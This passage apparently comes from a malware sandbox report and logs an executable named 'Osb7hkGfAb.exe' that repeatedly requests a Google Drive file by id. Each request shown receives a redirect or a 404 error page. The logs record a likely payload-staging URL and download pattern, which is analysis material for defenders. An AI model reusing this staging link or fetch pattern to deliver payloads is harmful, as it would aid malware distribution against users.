                                                                15192.168.2.949726216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:16 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:16 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRpiqGEPX-n2utksJGd34FgwjlnM9Cf46XbpI9kV312sUK5kBwMrd3OtJaDE6q8U5Zx
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:16 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-IHyfGK6NjM1477L0lhPOeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:16 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 48 65 62 62 78 61 35 50 75 4d 48 4d 4b 72 59 6c 53 57 32 48 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yHebbxa5PuMHMKrYlSW2Hw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.949727142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:17 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:17 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:17 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-RlIs1petJ8-5IbuWYb7Xsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.949728216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:18 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:19 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC6CTaJF6li4qfG1Jbp1vyIYNwLQUabViIf8xxTdMd_8LUeI-936oOGOEbpTosc3n_HCB3wy9IM
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:18 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-DTbENDwtkkTkdYQxvy9cYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:19 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 74 36 4d 75 78 36 4b 67 36 66 36 48 6c 62 38 66 57 67 70 73 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Yt6Mux6Kg6f6Hlb8fWgpsw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.949729142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:19 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:20 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:20 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-SpAxjgKjwdfT_VsaYdvEnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.949730216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:20 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:21 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQys0xdjd8d0iAhgMTYC5amCQIvmqi0DftZIdE3lSX3882aKe-U6n1dMcN5fCGKyPMi
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:21 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-wefIlMyrmVpfA3R0VLu4kA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:21 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 46 56 6e 76 6d 6f 38 65 56 42 48 47 56 32 73 43 50 59 6a 79 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HFVnvmo8eVBHGV2sCPYjyg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.949731142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:22 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:22 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:22 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-gK3Cskc8kOx_u7ctUTAEjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.949732216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:23 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:23 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRDjHdwOpl_xT2NVQp5cBMnB3tDYaDrlxa5LRI03XB3bxUuElUQunq8YdEhhKxdJm4i
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:23 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-po9Sh3lnv_bhWJ3v8q_fuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 70 6c 78 34 76 4c 65 4d 47 41 72 53 5f 74 2d 58 42 71 33 79 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Oplx4vLeMGArS_t-XBq3yA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.949733142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:24 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:24 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:24 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
